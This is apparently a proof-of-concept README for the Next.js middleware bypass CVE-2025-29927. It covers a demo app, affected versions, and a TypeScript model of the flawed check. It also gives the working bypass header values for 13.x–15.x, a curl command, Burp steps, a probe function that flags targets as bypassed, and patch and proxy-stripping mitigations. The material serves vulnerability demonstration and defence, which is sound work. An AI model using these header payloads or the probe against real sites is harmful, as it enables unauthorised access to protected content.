Related vulnerability
Introduction
# Next.js CVE-2025-29927
This repository contains a proof of concept for the CVE-2025-29927 vulnerability in Next.js. The internal header `x-middleware-subrequest`, which Next.js used to mark requests that its own middleware had issued, was accepted from external clients as well; a request carrying it skips the middleware entirely, which bypasses any check the middleware enforces, such as authentication.
# Affected Versions
- Next.js 15.x < 15.2.3
- Next.js 14.x < 14.2.25
- Next.js 13.x < 13.5.9
## Installation
> 🧪 This project was tested with **Next.js v13.4.19**.
1. Clone the repository:
```bash
git clone https://github.com/goncalocsousa1/CVE-2025-29927.git
cd CVE-2025-29927
```
2. Install dependencies:
```bash
npm install
```
## Running the Application
1. Start the development server:
```bash
npm run dev
```
2. Access the application in your browser:
```
http://localhost:3000
```
## How the website works
The application demonstrates a simple authentication system with a protected route that can be bypassed using the CVE-2025-29927 vulnerability. Here's how it works:
1. **Home Page (`/`)**
- Displays a welcome message and a login button
- When clicked, the login button sets a fake authentication cookie (`auth-token`)
- After "logging in", users are redirected to the protected page
2. **Protected Page (`/protected`)**
- Contains sensitive information that should only be accessible to authenticated users
- Protected by middleware that checks for the presence of the `auth-token` cookie
- Normally, unauthenticated users would be redirected to the home page
3. **Middleware Protection**
- The middleware checks if the user has an `auth-token` cookie
- If not authenticated and trying to access `/protected/*` routes, redirects to home page
- This protection can be bypassed using the vulnerability
4. **Vulnerability Demonstration**
- The application showcases how the `x-middleware-subrequest` header can be exploited
- This allows attackers to bypass the middleware authentication check
- Even without a valid `auth-token` cookie, attackers can access protected routes
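The flow described in the four points above, as an added example that is not the repository's own `middleware.ts` and not Next.js source: the demo middleware is written from the description, the pre-patch framework checks are reconstructed from the public advisory and postmortem, and the patched behaviour is modelled only in outline (the per-process id value is a hypothetical placeholder).

```typescript
// Added example: a small model of the request path that CVE-2025-29927 abuses.
// NOT Next.js source and NOT this repository's middleware.ts.

type HeaderMap = Record<string, string>;
type Major = 13 | 14 | 15;

interface DemoRequest {
  path: string;
  headers: HeaderMap;              // lower-cased names, as Node delivers them
  cookies: Record<string, string>;
}
interface DemoResponse { status: number; location?: string; body?: string }

// The demo app's protection: /protected/* without an auth-token cookie is
// redirected to the home page (307 is the default status of a Next.js redirect).
function authMiddleware(req: DemoRequest): DemoResponse | null {
  if (req.path.startsWith("/protected") && !req.cookies["auth-token"]) {
    return { status: 307, location: "/" };
  }
  return null; // let the request continue to the route handler
}

// Pre-patch framework logic: x-middleware-subrequest marked requests that the
// middleware had itself issued, and such requests did not run middleware again.
// 13.x/14.x: skip when the middleware's name appears anywhere in the ':'-separated list.
// 15.x: count occurrences of the name; at the recursion limit (5) middleware is skipped.
// The name is "middleware" for a root-level middleware.ts, "src/middleware" under src/.
function skipsMiddlewareUnpatched(headers: HeaderMap, major: Major, name = "middleware"): boolean {
  const subreq = headers["x-middleware-subrequest"];
  if (!subreq) return false;
  const parts = subreq.split(":");
  if (major === 15) return parts.filter((p) => p === name).length >= 5;
  return parts.includes(name);
}

// Patched logic, modelled in outline: the subrequest header is honoured only
// when it comes with a per-process random id that only the server knows.
const SUBREQUEST_ID = "c0ffee-hypothetical-per-process-secret"; // placeholder, not a real value
function skipsMiddlewarePatched(headers: HeaderMap): boolean {
  const subreq = headers["x-middleware-subrequest"];
  if (!subreq) return false;
  return headers["x-middleware-subrequest-id"] === SUBREQUEST_ID;
}

// Minimal server: run middleware unless the framework decides to skip it,
// then serve the protected page.
function handle(req: DemoRequest, skips: (h: HeaderMap) => boolean): DemoResponse {
  if (!skips(req.headers)) {
    const early = authMiddleware(req);
    if (early) return early;
  }
  return { status: 200, body: "sensitive content" };
}

function serveUnpatched(req: DemoRequest, major: Major): DemoResponse {
  return handle(req, (h) => skipsMiddlewareUnpatched(h, major));
}
function servePatched(req: DemoRequest): DemoResponse {
  return handle(req, skipsMiddlewarePatched);
}
```

`serveUnpatched({ path: "/protected", headers: { "x-middleware-subrequest": "middleware" }, cookies: {} }, 13)` returns the protected page with status 200 although no cookie is present; the same request against `servePatched` is redirected, because the attacker cannot supply the matching id.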
## How to Exploit
This application includes a protected route at `/protected` that normally requires authentication. Sending the header `x-middleware-subrequest: middleware` makes the server treat the request as one of its own internal subrequests and skip the middleware, so `curl -i -H "x-middleware-subrequest: middleware" http://localhost:3000/protected` returns the protected page, whereas the same request without the header is answered with a redirect to `/`. The single value `middleware` is what the 13.x and 14.x check accepts (including the 13.4.19 used here); 15.x counts repetitions of the name against its recursion limit of five, so there the value is `middleware:middleware:middleware:middleware:middleware`. If the project keeps the file under `src/`, the name is `src/middleware` instead.
You can also reproduce this behavior using [Burp Suite](https://portswigger.net/burp/communitydownload) by intercepting the request and manually adding the header.
To try this with Burp Suite, open the ```Proxy``` tab and go to the ```Intercept``` sub-tab. Make sure ```Intercept is On```, then click on **Open Browser** and navigate to the protected route: ```http://localhost:3000/protected```

Burp Suite will capture the request to the protected route. From there, add the header `x-middleware-subrequest: middleware` (*highlighted in the screenshot above*). Finally, forward the request: the protected page loads even though no `auth-token` cookie was ever set.
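The curl and Burp steps above test one request by hand. The following is an added example, not code from this repository, that does the same comparison programmatically (baseline request versus the same request with the header, without following redirects) and also shows the edge-side workaround from the Vercel postmortem. The HTTP client is injected so the probe can be exercised against a fake server; pass the global `fetch` for a real target. Target URL and path are parameters, not fixed values.

```typescript
// Added example (not code from this repository): probe a Next.js target for the
// middleware bypass and strip the header at a proxy or WAF.

type HeaderMap = Record<string, string>;
type Major = 13 | 14 | 15;
type ProbeResponse = { status: number };
type Fetcher = (url: string, init: { headers: HeaderMap; redirect: "manual" }) => Promise<ProbeResponse>;

const SUBREQUEST_HEADER = "x-middleware-subrequest";

// Header value accepted by the pre-patch check of each major line. 13.x/14.x
// look for the middleware's name in the list; 15.x counts repetitions against
// its recursion limit of 5, so the name must appear five times. Projects that
// keep the file under src/ register it as "src/middleware".
function bypassHeaderValue(major: Major, name = "middleware"): string {
  return major === 15 ? Array(5).fill(name).join(":") : name;
}

type Verdict = "bypassed" | "not-bypassed" | "inconclusive";

// Compare the unauthenticated baseline with the same request plus the header.
// redirect: "manual" matters: following the redirect to "/" would give the
// baseline a 200 as well and hide the difference.
function classify(baseline: number, withHeader: number): Verdict {
  const denied = [301, 302, 303, 307, 308, 401, 403].includes(baseline);
  if (!denied) return "inconclusive"; // route is not actually gated, nothing to bypass
  return withHeader === 200 ? "bypassed" : "not-bypassed";
}

async function probe(base: string, path: string, doFetch: Fetcher, major: Major = 13): Promise<Verdict> {
  const url = base.replace(/\/+$/, "") + path;
  const baseline = await doFetch(url, { headers: {}, redirect: "manual" });
  const attempt = await doFetch(url, {
    headers: { [SUBREQUEST_HEADER]: bypassHeaderValue(major) },
    redirect: "manual",
  });
  return classify(baseline.status, attempt.status);
}

// Workaround recommended in the Vercel postmortem when upgrading is not
// immediately possible: drop the header from external requests before they
// reach Next.js. Names are compared case-insensitively because HTTP header
// names are; the returned list lets the caller log or alert on attempts.
function stripSubrequestHeader(inbound: HeaderMap): { headers: HeaderMap; dropped: string[] } {
  const headers: HeaderMap = {};
  const dropped: string[] = [];
  for (const [name, value] of Object.entries(inbound)) {
    if (name.toLowerCase() === SUBREQUEST_HEADER) dropped.push(`${name}: ${value}`);
    else headers[name] = value;
  }
  return { headers, dropped };
}
```

Against the demo app, `probe("http://localhost:3000", "/protected", fetch, 13)` resolves to `"bypassed"` on an unpatched install; the stripping function belongs in the reverse proxy in front of the application and is only a stopgap, since patched versions ignore a forged header on their own.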

# Solution
Update to one of the following patched versions. If upgrading is not immediately possible, the Vercel postmortem recommends preventing external requests that carry the `x-middleware-subrequest` header from reaching the Next.js application (for example by dropping the header at the reverse proxy or WAF).
- Next.js 15.2.3 or higher
- Next.js 14.2.25 or higher
- Next.js 13.5.9 or higher
# Sources
- https://vercel.com/blog/postmortem-on-next-js-middleware-bypass
- https://nvd.nist.gov/vuln/detail/CVE-2025-29927
File snapshot
[4.0K] /data/pocs/3e0f1c3d296fed86d5bcb989450f56b959601b6b
├── [4.0K] app
│ ├── [ 59] globals.css
│ ├── [ 341] layout.tsx
│ ├── [ 943] page.tsx
│ └── [4.0K] protected
│ └── [1013] page.tsx
├── [ 438] middleware.ts
├── [ 134] next.config.js
├── [ 201] next-env.d.ts
├── [ 540] package.json
├── [ 71K] package-lock.json
├── [ 82] postcss.config.js
├── [3.4K] README.md
├── [ 253] tailwind.config.js
└── [ 595] tsconfig.json
2 directories, 13 files